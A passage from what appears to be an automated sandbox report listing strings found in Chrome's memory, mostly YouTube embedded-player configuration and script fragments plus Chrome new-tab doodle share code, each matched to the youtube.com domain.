u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true}Url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true},W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(":",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,fun
                                  Source: chrome.exe, 00000000.00000003.2344254909.000028EC04B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ,\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FFU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2508320989.000028EC07F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -player.vflset/www-embed-player.js\" name=\"embed_client\" id=\"base-js\" nonce=\"NJyqDsAj1TAa8VDP1RD_bg\"></script><script src=\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\" name=\"player/base\" nonce=\"NJyqDsAj1TAa8VDP1RD_bg\"></script><script nonce=\"\">writeEmbed();</script><script nonce=\"\">if (window.ytcsi) {ytcsi.infoGel({serverTimeMs: 43.0 }, '');}</script><noscript><div class=\"player-unavailable\"><h1 class=\"message\">An error occurred.</h1><div class=\"submessage\"><a href=\"https://www.youtube.com/watch?v=h15NcT6UXh0\" target=\"_blank\">Try watching this video on www.youtube.com</a>, or enable JavaScript if it is disabled in your browser.</div></div></noscript></body>","favicon":"","currentUrl":"https://fountainofhealth.ca/en","listArrString":[null,"https://www.youtube.com/watch?v=h15NcT6UXh0","https://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F"],"imgArrString":["https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,AA==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADGCAYAAAAT+OqFAAAAdklEQVQoz42QQQ7AIAgEF/T/D+kbq/RWAlnQyyazA4aoAB4FsBSA/bFjuF1EOL7VbrIrBuusmrt4ZZORfb6ehbWdnRHEIiITaEUKa5EJqUakRSaEYBJSCY2dEstQY7AuxahwXFrvZmWl2rh4JZ07z9dLtesfNj5q0FU3A5ObbwAAAABJRU5ErkJggg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}kejpgkiemlaofpalmlakkmbjdnl/jquery-3.5.1.min.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.youtube.com_KEY equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2370154176.000028EC062EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: /537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,51010235,51063643,51098299,51176511,51204329,51222973,51237842,51313767,51340662,51349914,51353393,51354
                                  Source: chrome.exe, 00000000.00000003.2361454430.000028EC07F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: /537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,51010235,51063643,51098299,51176511,51204329,51222973,51237842,51313767,51340662,51349914,51353393,51354
                                  Source: chrome.exe, 00000000.00000003.2323304427.000028EC06A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\
                                  Source: chrome.exe, 00000000.00000002.2493480651.000028EC04191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\
                                  Source: chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 18QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: 20QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 3+https://www.youtube.com/generate_204?oFXXFw( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 5https://www.youtube.com/^0https://fountainofhealth.ca equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 7https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2301954365.000028EC06804000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px 